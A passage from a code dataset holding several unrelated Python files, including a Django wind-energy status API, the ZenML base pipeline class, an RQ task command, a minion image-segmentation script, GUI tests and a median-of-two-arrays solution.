http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Author: Josh Livni (jlivni@google.com)\n\n\nfrom datetime import datetime\nimport json\n\nfrom django.conf import settings\nfrom django.shortcuts import render_to_response, get_object_or_404\nfrom django.template import RequestContext\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, Http404\n\nfrom windfriendly.models import BPA, Normalized\nfrom windfriendly.parsers import BPAParser\n\ndef json_response(func):\n \"\"\"\n A decorator thats takes a view response and turns it\n into json. If a callback is added through GET or POST\n the response is JSONP.\n \"\"\"\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = json.dumps(objects)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except:\n data = json.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n return decorator\n\n\ndef getBalancingAuthority(lat, lng):\n return 'BPA'\n\n@json_response\ndef status(request):\n lat = request.GET.get('lat', '')\n lng = request.GET.get('lng', '')\n\n ba = getBalancingAuthority(lat, lng)\n raw = BPA.objects.latest('date')\n\n percent_green = raw.wind * 1.0 / (raw.wind + raw.hydro + raw.thermal) * 100.0\n time = raw.date.strftime('%Y-%m-%d %H:%M')\n\n data = {\n 'lat': lat,\n 'lng': lng,\n 'balancing_authority': 'BPA',\n 'time': time,\n 'percent_green': round(percent_green,3)\n }\n return data\n template = 'templates/default.json'\n return render_to_response(template, RequestContext(request,{'json':data}))\n\n@json_response\ndef forecast(request):\n lat = request.GET.get('lat', '')\n lng = request.GET.get('lng', '')\n\n rows = BPA.objects.all().order_by('-id')[:289]\n hourly_avg = 0\n forecast = []\n for i, r in enumerate(rows):\n hourly_avg += r.wind * 1.0 / (r.wind + r.hydro + r.thermal) * 100.0\n if i and not i % 12: # 5 minute intervals\n data = {\n 'hour': i / 12,\n 'percent_green': round(hourly_avg / 12,3)\n }\n forecast.append(data)\n hourly_avg = 0\n return {\n 'forecast' : forecast,\n 'balancing_authority': 'BPA'\n }\n\n@json_response\ndef update(request, utility):\n if utility == 'bpa':\n parser = BPAParser()\n return parser.update()\n","sub_path":"site/windfriendly/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"274545888","text":"# Copyright (c) maiot GmbH 2020. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"Base High-level ZenML Pipeline definition\"\"\"\n\nimport time\nfrom abc import abstractmethod\nfrom typing import Dict, Text, Any, Optional, List\nfrom uuid import uuid4\n\nfrom zenml.backends.orchestrator import OrchestratorBaseBackend\nfrom zenml.constants import CONFIG_VERSION\nfrom zenml.datasources import BaseDatasource\nfrom zenml.enums import PipelineStatusTypes\nfrom zenml.exceptions import AlreadyExistsException\nfrom zenml.logger import get_logger\nfrom zenml.metadata import ZenMLMetadataStore\nfrom zenml.repo import Repository, ArtifactStore\nfrom zenml.standards import standard_keys as keys\nfrom zenml.steps import BaseStep\nfrom zenml.utils import source_utils\nfrom zenml.utils.analytics_utils import track, CREATE_PIPELINE, RUN_PIPELINE, \\\n GET_PIPELINE_ARTIFACTS\nfrom zenml.utils.print_utils import to_pretty_string, PrintStyles\n\nlogger = get_logger(__name__)\n\n\nclass BasePipeline:\n \"\"\"Base class for all ZenML pipelines.\n\n Every ZenML pipeline should override this class.\n \"\"\"\n PIPELINE_TYPE = 'base'\n\n def __init__(self,\n name: Text = None,\n enable_cache: Optional[bool] = True,\n steps_dict: Dict[Text, BaseStep] = None,\n backend: OrchestratorBaseBackend = None,\n metadata_store: Optional[ZenMLMetadataStore] = None,\n artifact_store: Optional[ArtifactStore] = None,\n datasource: Optional[BaseDatasource] = None,\n datasource_commit_id: Optional[Text] = None,\n pipeline_name: Optional[Text] = None,\n *args, **kwargs):\n \"\"\"\n Construct a base pipeline. This is a base interface that is meant\n to be overridden in multiple other pipeline use cases.\n\n Args:\n name: Outward-facing name of the pipeline.\n pipeline_name: A unique name that identifies the pipeline after\n it is run.\n enable_cache: Boolean, indicates whether or not caching\n should be used.\n steps_dict: Optional dict of steps.\n backend: Orchestrator backend.\n metadata_store: Configured metadata store. If None,\n the default metadata store is used.\n artifact_store: Configured artifact store. If None,\n the default artifact store is used.\n datasource: The datasource to use.\n datasource_commit_id: The datasource commit id to use.\n \"\"\"\n # Generate a name if not given\n if name is None:\n name = str(round(time.time() * 1000))\n self.name = name\n self._immutable = False\n\n # Metadata store\n if metadata_store:\n self.metadata_store: ZenMLMetadataStore = metadata_store\n else:\n # use default\n self.metadata_store: ZenMLMetadataStore = \\\n Repository.get_instance().get_default_metadata_store()\n\n if pipeline_name:\n # This means its been loaded in through YAML, try to get context\n self.pipeline_name = pipeline_name\n self.file_name = self.pipeline_name + '.yaml'\n else:\n # if pipeline_name is None then its a new pipeline\n self.pipeline_name = self.create_pipeline_name_from_name()\n self.file_name = self.pipeline_name + '.yaml'\n # check duplicates here as its a 'new' pipeline\n self._check_registered()\n track(event=CREATE_PIPELINE)\n logger.info(f'Pipeline {name} created.')\n\n self.enable_cache = enable_cache\n\n if steps_dict is None:\n self.steps_dict: Dict[Text, BaseStep] = {}\n else:\n self.steps_dict = steps_dict\n\n # Default to local\n if backend is None:\n self.backend = OrchestratorBaseBackend()\n else:\n self.backend = backend\n\n # Artifact store\n if artifact_store:\n self.artifact_store = artifact_store\n else:\n # use default\n self.artifact_store = \\\n Repository.get_instance().get_default_artifact_store()\n\n # Datasource\n if datasource:\n self.datasource = datasource\n self.datasource_commit_id = datasource.get_latest_commit()\n else:\n self.datasource = None\n self.datasource_commit_id = None\n\n if datasource_commit_id:\n self.datasource_commit_id = datasource_commit_id\n\n self._source = source_utils.resolve_class(self.__class__)\n self._kwargs = {\n keys.PipelineDetailKeys.NAME: self.pipeline_name,\n keys.PipelineDetailKeys.ENABLE_CACHE: self.enable_cache,\n }\n if kwargs:\n self._kwargs.update(kwargs)\n\n def __str__(self):\n return to_pretty_string(self.to_config())\n\n def __repr__(self):\n return to_pretty_string(self.to_config(), style=PrintStyles.PPRINT)\n\n @property\n def is_executed_in_metadata_store(self):\n try:\n # if we find context, then it has been executed\n self.metadata_store.get_pipeline_context(self)\n return True\n except Exception as _:\n return False\n\n @abstractmethod\n def get_tfx_component_list(self, config: Dict[Text, Any]) -> List:\n \"\"\"\n Converts config to TFX components list. This is the point in the\n framework where ZenML Steps get translated into TFX pipelines.\n\n Args:\n config: dict of ZenML config.\n \"\"\"\n pass\n\n @abstractmethod\n def steps_completed(self) -> bool:\n \"\"\"Returns True if all steps complete, else raises exception\"\"\"\n pass\n\n @staticmethod\n def get_name_from_pipeline_name(pipeline_name: Text):\n \"\"\"\n Gets name from pipeline name.\n\n Args:\n pipeline_name (str): simple string name.\n \"\"\"\n return \"_\".join(pipeline_name.split('_')[1:-1])\n\n @classmethod\n def from_config(cls, config: Dict):\n \"\"\"\n Convert from pipeline config to ZenML Pipeline object.\n\n All steps are also populated and configuration set to parameters set\n in the config file.\n\n Args:\n config: a ZenML config in dict-form (probably loaded from YAML).\n \"\"\"\n # start with artifact store\n artifact_store = ArtifactStore(config[keys.GlobalKeys.ARTIFACT_STORE])\n\n # metadata store\n metadata_store = ZenMLMetadataStore.from_config(\n config=config[keys.GlobalKeys.METADATA_STORE]\n )\n\n # orchestration backend\n backend = OrchestratorBaseBackend.from_config(\n config[keys.GlobalKeys.BACKEND])\n\n # pipeline configuration\n p_config = config[keys.GlobalKeys.PIPELINE]\n kwargs = p_config[keys.PipelineKeys.ARGS]\n pipeline_name = kwargs.pop(keys.PipelineDetailKeys.NAME)\n pipeline_source = p_config[keys.PipelineKeys.SOURCE]\n\n # populate steps\n steps_dict: Dict = {}\n for step_key, step_config in p_config[keys.PipelineKeys.STEPS].items():\n steps_dict[step_key] = BaseStep.from_config(step_config)\n\n # datasource\n datasource = BaseDatasource.from_config(\n config[keys.GlobalKeys.PIPELINE])\n\n # datasource commit\n datasource_commit_id = p_config[keys.PipelineKeys.DATASOURCE_COMMIT_ID]\n\n class_ = source_utils.load_source_path_class(pipeline_source)\n\n obj = class_(\n steps_dict=steps_dict,\n backend=backend,\n artifact_store=artifact_store,\n metadata_store=metadata_store,\n datasource=datasource,\n datasource_commit_id=datasource_commit_id,\n pipeline_name=pipeline_name,\n name=cls.get_name_from_pipeline_name(pipeline_name),\n **kwargs\n )\n obj._immutable = True\n return obj\n\n def _check_registered(self):\n if Repository.get_instance().get_pipeline_by_name(\n self.name) is not None:\n raise AlreadyExistsException(\n name=self.name, resource_type='pipeline')\n\n def _validate_steps(self):\n \"\"\"Ensure that steps are of the right type\"\"\"\n for step_name, step_val in self.steps_dict.items():\n if not issubclass(type(step_val), BaseStep):\n raise AssertionError(\n f'Step {step_name} needs to be an object that is a '\n f'sub-class of: {BaseStep}')\n\n def add_datasource(self, datasource: BaseDatasource,\n commit_id: Text = None):\n \"\"\"\n Add datasource to pipeline.\n\n Args:\n datasource: class of type BaseDatasource.\n commit_id: optionally the commit of the datasource to use. If\n left None, then latest commit is used.\n \"\"\"\n self.datasource = datasource\n if commit_id is None:\n self.datasource_commit_id = datasource.get_latest_commit()\n\n def create_pipeline_name_from_name(self):\n \"\"\"Creates a unique pipeline name from user-provided name.\"\"\"\n return self.PIPELINE_TYPE.lower() + '_' + self.name + '_' + str(\n uuid4())\n\n def get_steps_config(self) -> Dict:\n \"\"\"Convert Step classes to steps config dict.\"\"\"\n steps_config = {}\n for step_key, step in self.steps_dict.items():\n steps_config[step_key] = step.to_config()\n\n return {keys.PipelineKeys.STEPS: steps_config}\n\n def get_pipeline_config(self):\n \"\"\"Get pipeline config\"\"\"\n steps_config = self.get_steps_config()\n steps_config.update({\n keys.PipelineKeys.ARGS: self._kwargs,\n keys.PipelineKeys.SOURCE: self._source,\n keys.PipelineKeys.DATASOURCE: self.datasource.to_config() if\n self.datasource is not None else {},\n keys.PipelineKeys.DATASOURCE_COMMIT_ID: self.datasource_commit_id,\n })\n return steps_config\n\n def to_config(self) -> Dict:\n \"\"\"Converts entire pipeline to ZenML config.\"\"\"\n return {\n keys.GlobalKeys.VERSION: CONFIG_VERSION,\n keys.GlobalKeys.METADATA_STORE: self.metadata_store.to_config(),\n keys.GlobalKeys.ARTIFACT_STORE: self.artifact_store.path,\n keys.GlobalKeys.BACKEND: self.backend.to_config(),\n keys.GlobalKeys.PIPELINE: self.get_pipeline_config(),\n }\n\n def get_status(self) -> Text:\n \"\"\"Get status of pipeline.\"\"\"\n store = self.metadata_store\n return store.get_pipeline_status(self)\n\n def register_pipeline(self, config: Dict[Text, Any]):\n \"\"\"\n Registers a pipeline in the artifact store as a YAML file.\n\n Args:\n config: dict representation of ZenML config.\n \"\"\"\n self._check_registered()\n Repository.get_instance().register_pipeline(\n file_name=self.file_name, config=config)\n\n def load_config(self) -> Dict[Text, Any]:\n \"\"\"Loads a config dict from yaml file.\"\"\"\n return Repository.get_instance().load_pipeline_config(\n file_name=self.file_name)\n\n @track(event=GET_PIPELINE_ARTIFACTS)\n def get_artifacts_uri_by_component(\n self, component_name: Text, resolve_locally: bool = True):\n \"\"\"\n Gets the artifacts of any component within a pipeline. All artifacts\n are resolved locally if resolve_locally flag is set.\n\n Args:\n component_name (str): name of component\n resolve_locally (bool): If True, artifact is downloaded locally.\n \"\"\"\n # TODO[HIGH]: In case of multiple artifacts (from the selected\n # component) no other information rather then the uri is passed\n # forward. This creates a situation where you would need to make\n # really hard assumptions and hardcode the index of the uri within\n # the returned list\n status = self.metadata_store.get_pipeline_status(self)\n if status != PipelineStatusTypes.Succeeded.name:\n AssertionError('Cannot retrieve as pipeline is not succeeded.')\n artifacts = self.metadata_store.get_artifacts_by_component(\n self, component_name)\n # Download if not base\n uris = []\n for a in artifacts:\n uris.append(self.artifact_store.resolve_uri_locally(\n a.uri) if resolve_locally else a.uri)\n return uris\n\n def copy(self, new_name: Text):\n \"\"\"\n Deep copy the pipeline and therefore remove mutability requirement.\n\n Args:\n new_name (str): New name for copied pipeline.\n \"\"\"\n class_ = self.__class__\n args = self.__dict__.copy()\n\n # Doing this will reset immutability\n args.pop('pipeline_name')\n args['name'] = new_name\n obj = class_(**args)\n obj._immutable = False\n return obj\n\n def run_config(self, config: Dict[Text, Any]):\n \"\"\"\n Gets TFX pipeline from config.\n\n Args:\n config: dict of ZenML config.\n \"\"\"\n assert issubclass(self.backend.__class__, OrchestratorBaseBackend)\n self.backend.run(config)\n\n @track(event=RUN_PIPELINE)\n def run(self,\n backend: OrchestratorBaseBackend = None,\n metadata_store: Optional[ZenMLMetadataStore] = None,\n artifact_store: Optional[ArtifactStore] = None):\n \"\"\"\n Run the pipeline associated with the datasource.\n\n Args:\n backend: orchestrator backend for pipeline.\n metadata_store: chosen metadata store, if None use default\n artifact_store: chosen artifact store, if None use default\n \"\"\"\n\n # TODO: [HIGH] Important, think about separating register and run\n # and that way ask user to input name while registering pipeline.\n\n # Resolve default\n if metadata_store:\n logger.warning('Changing the metadata_store or artifact_store '\n 'might cause your pipelines to be '\n 'non-reproducible and non-comparable.')\n self.metadata_store = metadata_store\n\n if artifact_store:\n logger.warning('Changing the metadata_store or artifact_store '\n 'might cause your pipelines to be '\n 'non-reproducible and non-comparable.')\n self.artifact_store = artifact_store\n\n if backend:\n self.backend = backend\n\n # We do not allow ml metadata to get polluted by repeated runs\n if self.is_executed_in_metadata_store:\n logger.info(f'Pipeline: `{self.name}` has already been executed '\n f'for the connected metadata store. Pipelines are '\n f'immutable after they run within the same metadata '\n f'store. If the pipeline failed, then try using '\n f'the `pipeline.copy(new_name)` method to copy the '\n f'current `pipeline` and give it a new name.')\n return\n\n # Check if steps are complete\n self.steps_completed()\n\n # Validate steps\n self._validate_steps()\n\n # assert some datasource stuff\n if self.datasource and self.datasource.metadata_store.to_config() != \\\n self.metadata_store.to_config():\n raise AssertionError(\n 'The metadata_store of the specified datasource is different '\n 'from this pipeline. Pipelines and their datasources need to '\n 'be in the same metadata_store.')\n if self.datasource and self.datasource.artifact_store.path != \\\n self.artifact_store.path:\n raise AssertionError(\n 'The artifact_store of the specified datasource is different '\n 'from this pipeline. Pipelines and their datasources need to '\n 'be in the same artifact_store.')\n\n if self._immutable:\n # This means its an 'older' pipeline that has been loaded in via\n # YAML but does not exist in the metadata store, so we are safe\n # to run it without inferring new version pins. This will result\n # in a repeated run.\n logger.info('Pipeline is an immutable state: Any changes made '\n 'after loading it will not be reflected in this run.')\n config = self.load_config()\n else:\n # This means its a brand new pipeline\n config = self.to_config()\n # Register in the repository\n self.register_pipeline(config)\n\n self.run_config(config)\n\n # After running, pipeline is immutable\n self._immutable = True\n","sub_path":"zenml/pipelines/base_pipeline.py","file_name":"base_pipeline.py","file_ext":"py","file_size_in_byte":17394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"166769946","text":"from django.core.management.base import BaseCommand, CommandError\nimport django_rq\n\n\nclass TaskCommand(BaseCommand):\n help = 'Run task asynchronously; used to schedule tasks via crontab'\n\n def add_arguments(self, parser):\n parser.add_argument('--queue', '-Q', default='', help='The queue to work on')\n #parser.add_argument('num_beans', type=int)\n\n # def handle(self, *args, **options):\n # try:\n # #num_beans = int(options['num_beans'])\n # queue_name = options['queue']\n\n # from tasks.jobs import count_beans\n # from tasks.models import CountBeansTask as MyTask\n\n # param_names = MyTask.retrieve_param_names()\n # params = dict([item for item in options.items() if item[0] in param_names])\n\n # if queue_name:\n # queue = django_rq.get_queue(queue_name)\n # #queue.enqueue(count_beans, num_beans=num_beans)\n # queue.enqueue(count_beans, **params)\n # else:\n # #count_beans.delay(num_beans=num_beans)\n # count_beans.delay(**params)\n\n # except Exception as e:\n # raise CommandError('ERROR: %s' % str(e))\n # self.stdout.write('Done')\n\n def run_task(self, TaskClass, job_func, **options):\n try:\n queue_name = options['queue']\n\n param_names = TaskClass.retrieve_param_names()\n params = dict([item for item in options.items() if item[0] in param_names])\n\n if queue_name:\n queue = django_rq.get_queue(queue_name)\n #queue.enqueue(count_beans, num_beans=num_beans)\n job = queue.enqueue(job_func, **params)\n else:\n #count_beans.delay(num_beans=num_beans)\n job = job_func.delay(**params)\n\n except Exception as e:\n raise CommandError('ERROR: %s' % str(e))\n\n self.stdout.write('%s scheduled (job=%s)' % (TaskClass.__name__, job.get_id()))\n","sub_path":"tasks/task_command.py","file_name":"task_command.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"379220406","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: shiweiqiang Econ4A\n\"\"\"\nimport os\nimport glob\nimport itertools\nimport numpy as np\nfrom scipy.stats import multivariate_normal\nfrom PIL import Image\nfrom skimage import io\nfrom matplotlib import pyplot as plt\n\n# Load image\nSUPPORTED_EXTENSIONS = [\"bmp\", \"png\", \"jpg\", \"jpeg\"]\ndef dataset_files(root):\n #returns a list of all image files in the given directory\n return list(itertools.chain.from_iterable(\n glob.glob(os.path.join( root,\"*.{}\".format(ext) ) )\n for ext in SUPPORTED_EXTENSIONS))\n\n#讀取目錄的DIR\nImglist = dataset_files(\"originals/\")\nN = len(Imglist)\nprint(\"Image N\",N)\n\n\n# to array\nfor i in range(N):\n Imglist[i] = Image.open(Imglist[i])\n Imglist[i] = np.array(Imglist[i])\n print(\"Original Image shape \",i+1,\":\",Imglist[i].shape)\n\n'''\nimage = Image.open(\"duck.jpg\")\nW,H = image.size\n# resize img to H/2 W/2 || speedup 5X\n# to remove this opinion ,replace all \"/2)\" to \"/2)\"\nH = int(H/2)\nW = int(W/2)\nimage = image.resize((W,H))\nimage = np.array(image)\nprint(image.shape)\n'''\n\n# Resize img to speedup\nH = int((Imglist[0].shape[0]))\nW = int((Imglist[0].shape[1]))\n\"\"\"\nImglist = dataset_files(\"originals/\")\nfor i in range(N):\n Imglist[i] = Image.open(Imglist[i])\n Imglist[i] = Imglist[i].resize((W,H))\n Imglist[i] = np.array(Imglist[i])\n print(\"Resize Image shape \",i+1,\":\",Imglist[i].shape)\n\"\"\"\n\n# Crop img\ndef sample_crop(Bg_image_array, UL_local_tuple, LR_local_tuple):\n \"\"\"\n # parameter:\n image the background image by numpy_array\n UL_local_tuple (x1,y1) the location of Upper Left Corner\n LR_local_tuple (x2,y2) the location of Lower Right Corner\n \"\"\"\n (x1, y1) = UL_local_tuple\n (x2, y2) = LR_local_tuple\n x1 = int(x1)\n x2 = int(x2)\n y1 = int(y1)\n y2 = int(y2)\n image_crop_H = y2 - y1\n image_crop_W = x2 - x1\n sample_array = np.zeros((image_crop_H, image_crop_W, Bg_image_array.shape[2]), dtype=np.uint8)\n for i in range(image_crop_H): # H\n for j in range(image_crop_W): # W\n sample_array[i][j] = Bg_image_array[i + y1][j + x1]\n return sample_array\n\n\n\n\n\"\"\"\n# Method 1-----------------------------------------------\nminion_sample_head = Sample_Crop(Imglist[0], (70/2,367/2), (138/2,448/2))\nprint(\"Positive Sample:\",minion_sample_head.shape)\nsolve_Img = Image.fromarray(minion_sample_head, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_head.jpg\")\n\nminion_sample_body = Sample_Crop(Imglist[0], (70/2,470/2), (128/2,530/2))\nprint(\"Positive Sample:\",minion_sample_body.shape)\nsolve_Img = Image.fromarray(minion_sample_body, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_body.jpg\")\n\nbg_sample = Sample_Crop(Imglist[0], (470/2,460/2), (570/2,540/2))\nprint(\"Negative Sample:\",bg_sample.shape)\nsolve_Img_Bg = Image.fromarray(bg_sample, mode=\"RGB\")\nsolve_Img_Bg.save(\"bg_sample.jpg\")\n\n# train\ntrainP_head = minion_sample_head\ntrainP_head = trainP_head.reshape((minion_sample_head.shape[0]*minion_sample_head.shape[1]),3)\nprint(\"trainP_head.Shape:\",trainP_head.shape)\n\ntrainP_body = minion_sample_body\ntrainP_body = trainP_body.reshape((minion_sample_body.shape[0]*minion_sample_body.shape[1]),3)\nprint(\"trainP_head.Shape:\",trainP_body.shape)\n\ntrainN_Bg = bg_sample\ntrainN_Bg = trainN_Bg.reshape((bg_sample.shape[0]*bg_sample.shape[1]),3)\nprint(\"trainN.Shape:\",trainN_Bg.shape)\n\ntmp1 = np.cov(trainP_head,rowvar=False)\ncov_head = np.diag(np.diag(tmp1)) # 斜對角矩陣 只有斜線有0\n\ntmp2 = np.cov(trainP_body,rowvar=False)\ncov_body = np.diag(np.diag(tmp2))\n\ntmp3 = np.cov(trainN_Bg,rowvar=False)\ncov_bg = np.diag(np.diag(tmp3))\n\n# image_mark_minion[i] = np.zeros(Imglist[0].shape, dtype=np.uint8)\nImglist_output = Imglist.copy()\n\nfor n in range(N):\n for i in range(H): # H\n for j in range(W): # W\n r1 = multivariate_normal.pdf(Imglist[n][i, j, :], trainP_head.mean(axis=0), cov_head)\n r2 = multivariate_normal.pdf(Imglist[n][i, j, :], trainP_body.mean(axis=0), cov_body)\n r3 = multivariate_normal.pdf(Imglist[n][i, j, :], trainN_Bg.mean(axis=0), cov_bg, allow_singular=True)\n\n if ((r1 > r3) or (r2 > r3)): # minions\n Imglist_output[n][i, j, :] = (255, 255, 255)\n else: # bg\n Imglist_output[n][i, j, :] = (0, 0, 0)\n print(\"Image No.\",n+1,\"Row\", i+1)\n\n print(\"Finish No:\" ,n+1)\n # Imglist_output[n] = image_mark_minion\n # img = Image.fromarray(image_mark_minion)\n # img.save(\"duck_stats.jpg\")\n\n# -----------------------------------------------Finish Method1\n\"\"\"\n# Method 2-----------------------------------------------\nminion_sample_head = sample_crop(Imglist[0], (70,367), (138,448))\nprint(\"Positive Sample:\",minion_sample_head.shape)\nsolve_Img = Image.fromarray(minion_sample_head, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_head.jpg\")\n\nminion_sample_body = sample_crop(Imglist[0], (70,470), (128,530))\nprint(\"Positive Sample:\",minion_sample_body.shape)\nsolve_Img = Image.fromarray(minion_sample_body, mode=\"RGB\")\nsolve_Img.save(\"minion_sample_body.jpg\")\n\nbg_sample = sample_crop(Imglist[0], (470,460), (570,540))\nprint(\"Negative Sample:\",bg_sample.shape)\nsolve_Img_Bg = Image.fromarray(bg_sample, mode=\"RGB\")\nsolve_Img_Bg.save(\"bg_sample.jpg\")\n\n# train\nminion_sample_head = minion_sample_head.reshape(minion_sample_head.shape[0]*minion_sample_head.shape[1],3)\ntrainP_head=np.cov(minion_sample_head,rowvar=False)\ncov_ctr=np.diag(np.diag(trainP_head))\nD_mean=minion_sample_head.mean(axis=0)\nrv_ctr=multivariate_normal(D_mean,cov_ctr,allow_singular=True)\n\nminion_sample_body = minion_sample_body.reshape(minion_sample_body.shape[0]*minion_sample_body.shape[1],3)\ntrainP_body=np.cov(minion_sample_body,rowvar=False)\ncov_ctr_body=np.diag(np.diag(trainP_body))\nD_mean_body=minion_sample_body.mean(axis=0)\nrv_ctr_body=multivariate_normal(D_mean_body,cov_ctr_body,allow_singular=True)\n\n\nbg_sample = bg_sample.reshape(bg_sample.shape[0]*bg_sample.shape[1],3)\ntmp=np.cov(bg_sample,rowvar=False)\ncov=np.diag(np.diag(tmp))\nBg_mean=bg_sample.mean(axis=0)\nrv=multivariate_normal(Bg_mean,cov,allow_singular=True)\n\n\n#-----\n\n# -----\n\n\n# image_mark_minion[i] = np.zeros(Imglist[0].shape, dtype=np.uint8)\nImglist_output = Imglist.copy()\n\nfor n in range(1):\n for i in range(H): # H\n for j in range(W): # W\n ans = Imglist[n].copy()\n if np.linalg.norm(ans[i, j] - D_mean) < np.linalg.norm(ans[i, j] - Bg_mean):\n ans[i, j, 0] = 255\n ans[i, j, 1] = 255\n ans[i, j, 2] = 255\n else:\n ans[i, j, 0] = 0\n ans[i, j, 1] = 0\n ans[i, j, 2] = 0\n print(i)\n io.imshow(ans)\n Imglist_output[n] = ans\n print(\"Finish No:\",n+1)\n # Imglist_output[n] = image_mark_minion\n # img = Image.fromarray(image_mark_minion)\n # img.save(\"duck_stats.jpg\")\n\n\n\n# Save image\n# create dir\nif not os.path.isdir(\"Output/\"):\n os.makedirs(\"Output/\")\n# save Image\nfor i in range(len(Imglist)):\n img = Image.fromarray(Imglist_output[i])\n fname = \"Output/\" + str(i + 1) + \".jpg\"\n img.save(fname)","sub_path":"Group19_0521/Minion.py","file_name":"Minion.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"157751606","text":"from golem import actions\n\nfrom projects.golem_gui.pages import common\nfrom projects.golem_gui.pages.users import create_user\n\n\ndef setup(data):\n common.access_golem(data.env.url, data.env.admin)\n create_user.navigate_to_page()\n\n\ndef test(data):\n project = 'project1'\n permission = 'admin'\n create_user.select_project(project)\n create_user.select_permission(permission)\n actions.click(create_user.add_permission_button)\n create_user.assert_project_permission_in_table(project, permission)\n","sub_path":"projects/golem_gui/tests/users/create_user/add_project_permission.py","file_name":"add_project_permission.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"42082141","text":"import typing\n\nfrom flask_restful_swagger import swagger\n\nfrom manager_rest.rest import filters_utils, rest_decorators, rest_utils\nfrom manager_rest.security import SecuredResource\nfrom manager_rest.security.authorization import authorize\nfrom manager_rest.storage import (get_storage_manager,\n models)\n\nfrom ..responses_v2 import ListResponse\n\nif typing.TYPE_CHECKING:\n from typing import List, Iterable\n from manager_rest.rest.responses import Workflow\n\n\nclass Workflows(SecuredResource):\n @swagger.operation(\n responseClass='List[dict]',\n nickname=\"list\",\n notes=\"Returns a list of defined workflows.\"\n )\n @rest_decorators.marshal_list_response\n @rest_decorators.create_filters(models.Deployment)\n @rest_decorators.search('id')\n @rest_decorators.filter_id\n @authorize('deployment_list')\n def get(self, filters=None, search=None, filter_id=None, **kwargs):\n \"\"\"\n List workflows defined for deployments filtered by kwargs.\n \"\"\"\n _include = ['id', 'workflows']\n filters = filters or {}\n filters.update(rest_utils.deployment_group_id_filter())\n filter_rules = filters_utils.get_filter_rules_from_filter_id(\n filter_id, models.DeploymentsFilter)\n result = get_storage_manager().list(\n models.Deployment,\n include=_include,\n filters=filters,\n substr_filters=search,\n get_all_results=True,\n filter_rules=filter_rules,\n distinct=['_blueprint_fk'],\n )\n\n return workflows_list_response(result)\n\n\ndef workflows_list_response(deployments: 'Iterable') -> ListResponse:\n workflows = _extract_workflows(deployments)\n pagination = {\n 'total': len(workflows),\n 'size': len(workflows),\n 'offset': 0,\n }\n return ListResponse(items=[w.as_dict() for w in workflows],\n metadata={'pagination': pagination})\n\n\ndef _extract_workflows(\n deployments: 'List[models.Deployment]') -> 'List[Workflow]':\n workflows = set()\n for dep in deployments:\n workflows |= set(models.Deployment._list_workflows(dep.workflows))\n return list(workflows)\n\n\ndef _merge_workflows(w1: 'List[Workflow]',\n w2: 'List[Workflow]') -> 'List[Workflow]':\n workflows = {}\n for w in w1 + w2:\n workflows[w.name] = w\n return list(workflows.values())\n","sub_path":"rest-service/manager_rest/rest/resources_v3_1/workflows.py","file_name":"workflows.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"355681246","text":"from typing import *\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n \"\"\"\n 找到两个数组的中位数\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n m, n = len(nums1), len(nums2)\n if m > n:\n # 进行一步交换,确保第一个数组比第二个小\n return self.findMedianSortedArrays(nums2,nums1)\n idx_min, idx_max, half_len = 0, m, (m + n + 1) // 2\n while idx_min <= idx_max:\n i = (idx_min + idx_max) // 2\n j = half_len - i\n if i < m and nums2[j - 1] > nums1[i]:\n idx_min = i + 1\n elif i > 0 and nums1[i - 1] > nums2[j]:\n idx_max = i - 1\n else:\n if i == 0:\n max_of_left = nums2[j - 1]\n elif j == 0:\n max_of_left = nums1[i - 1]\n else:\n max_of_left = max(nums1[i - 1], nums2[j - 1])\n if (m + n) % 2 == 1:\n return max_of_left\n if i == m:\n min_of_right = nums2[j]\n elif j == n:\n min_of_right = nums1[i]\n else:\n min_of_right = min(nums1[i], nums2[j])\n return (max_of_left + min_of_right) / 2","sub_path":"数学/寻找两个正序数组的中位数_4.py","file_name":"寻找两个正序数组的中位数_4.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"572239184","text":"from pymor.discretizers.cg import discretize_stationary_cg\nfrom pymor.operators.numpy import NumpyGenericOperator, NumpyMatrixOperator\nfrom pymor.operators.constructions import LincombOperator, induced_norm\nfrom pymor.grids.subgrid import SubGrid\nfrom pymor.grids.boundaryinfos import SubGridBoundaryInfo\nfrom pymor.vectorarrays.numpy import 